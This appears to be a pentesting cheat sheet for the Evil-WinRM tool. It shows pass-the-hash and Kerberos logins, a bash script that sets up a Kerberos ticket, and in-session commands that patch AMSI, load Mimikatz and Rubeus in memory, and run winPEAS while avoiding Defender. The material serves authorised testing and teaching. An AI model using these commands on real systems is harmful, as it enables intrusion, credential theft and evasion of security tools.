Description
Evil-WinRM is a Ruby WinRM client built for pentesting. It gives an interactive PowerShell session over WinRM (TCP 5985 plain, 5986 over TLS), file upload and download, and in-memory loading of PowerShell scripts, C# executables and DLLs. The account used must be allowed to use WinRM on the target, which by default means a member of the local Administrators or Remote Management Users group.
Installation
BASH
gem install evil-winrm
# Or
sudo apt install evil-winrm
Basic Usage
BASH
# Password auth (default port 5985; -P <port> overrides it)
evil-winrm -i <IP> -u user -p 'password'
# Pass-the-Hash: -H takes the 32-hex NT hash only, not the LM:NT pair secretsdump prints
evil-winrm -i <IP> -u admin -H 'NTLM_HASH'
# With SSL/TLS (default port becomes 5986)
evil-winrm -i <IP> -u user -p 'password' -S
Advanced Usage
BASH
# Upload/download files (the remote path on upload is optional and defaults to the current remote directory)
*Evil-WinRM* PS> upload /local/file.exe C:\temp\file.exe
*Evil-WinRM* PS> download C:\temp\secret.txt /local/secret.txt
# Load PowerShell scripts from a local directory (-s): type the script name to load it, menu lists the loaded functions, then call them
evil-winrm -i <IP> -u user -p 'password' -s /scripts/
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> Invoke-Mimikatz.ps1
*Evil-WinRM* PS> menu
*Evil-WinRM* PS> Invoke-Mimikatz
# Load C# binaries in memory from a local directory (-e); Bypass-4MSI patches AMSI in the current session first so known tools are not flagged
evil-winrm -i <IP> -u user -p 'password' -e /executables/
*Evil-WinRM* PS> Bypass-4MSI
*Evil-WinRM* PS> Invoke-Binary /executables/Rubeus.exe
# With Kerberos: no -u/-p; needs a valid TGT in the credential cache (kinit) and the realm's KDC configured in krb5.conf
evil-winrm -i <IP> -r DOMAIN.LOCAL
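The Kerberos line does nothing on its own: evil-winrm hands authentication to the system GSSAPI library, which needs the realm's KDC from a krb5.conf and a TGT in the credential cache. The script below is an added example, not evil-winrm's own code, that does that setup without touching /etc/krb5.conf (a private config via KRB5_CONFIG, a private cache via KRB5CCNAME), obtains the TGT with kinit, confirms it with klist, and only then calls evil-winrm with -r. The realm CORP.LOCAL, the KDC dc01.corp.local, the user and the `krb_*`/`ewr_kerberos` function names are constructed for this example. Because the config sets rdns = false, the target must be given as its DNS name: the service ticket requested is HTTP/<name>, and an IP will not match.

```shell
#!/usr/bin/env bash
# Added example, not part of evil-winrm: the Kerberos setup that -r relies on.
# Realm, KDC and user names are constructed for the example.
set -u

# Kerberos realms are conventionally the upper-cased DNS domain.
krb_realm() { printf '%s\n' "$1" | tr 'a-z' 'A-Z'; }

# Emit a minimal krb5.conf for one realm. Pointed at with KRB5_CONFIG below so
# the system /etc/krb5.conf is left alone.
#   dns_lookup_kdc = false: use the kdc line, not SRV records (engagement DNS is often broken)
#   rdns = false: do not rewrite the target name via reverse DNS when building the SPN
krb5_conf_for() {
  local domain="$1" kdc="$2" realm
  realm=$(krb_realm "$domain")
  cat <<EOF
[libdefaults]
    default_realm = $realm
    dns_lookup_kdc = false
    rdns = false

[realms]
    $realm = {
        kdc = $kdc
        admin_server = $kdc
    }

[domain_realm]
    .$domain = $realm
    $domain = $realm
EOF
}

# True if the credential cache holds a TGT for the realm (checks klist output).
have_tgt_for() {
  klist 2>/dev/null | grep -q "krbtgt/$(krb_realm "$1")@"
}

# Full flow: private config and cache, TGT, evil-winrm.
#   ewr_kerberos <dns domain> <kdc host> <user> <target DNS name>
ewr_kerberos() {
  local domain="$1" kdc="$2" user="$3" target="$4" realm
  realm=$(krb_realm "$domain")
  export KRB5_CONFIG KRB5CCNAME
  KRB5_CONFIG=$(mktemp)
  KRB5CCNAME="FILE:$(mktemp -u)"
  krb5_conf_for "$domain" "$kdc" > "$KRB5_CONFIG"
  kinit "$user@$realm" || return 1            # prompts for the password; fails fast on a bad KDC
  have_tgt_for "$domain" || { echo "no TGT for $realm in $KRB5CCNAME" >&2; return 1; }
  evil-winrm -i "$target" -r "$realm"         # target must be a DNS name, not an IP
}

# Usage (interactive, prompts for the password):
#   ewr_kerberos corp.local dc01.corp.local j.doe ws01.corp.local
```

If kinit succeeds but evil-winrm still fails to authenticate, run `klist` after the attempt: a missing HTTP/<target>@REALM service ticket means the SPN lookup failed (wrong target name or clock skew with the KDC), while a present one means the account is simply not allowed to use WinRM on that host.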
Common Workflows
BASH
# Full attack flow: PtH with the NT hash, local script (-s) and binary (-e) directories given up front
evil-winrm -i <IP> -u admin -H 'HASH' -s /tools/ -e /binaries/
*Evil-WinRM* PS> Bypass-4MSI
# upload with no remote path drops the file in the current remote directory (the user's Documents folder by default); writing a known tool to disk will trip Defender, use Invoke-Binary from -e to keep it in memory
*Evil-WinRM* PS> upload winPEAS.exe
*Evil-WinRM* PS> .\winPEAS.exe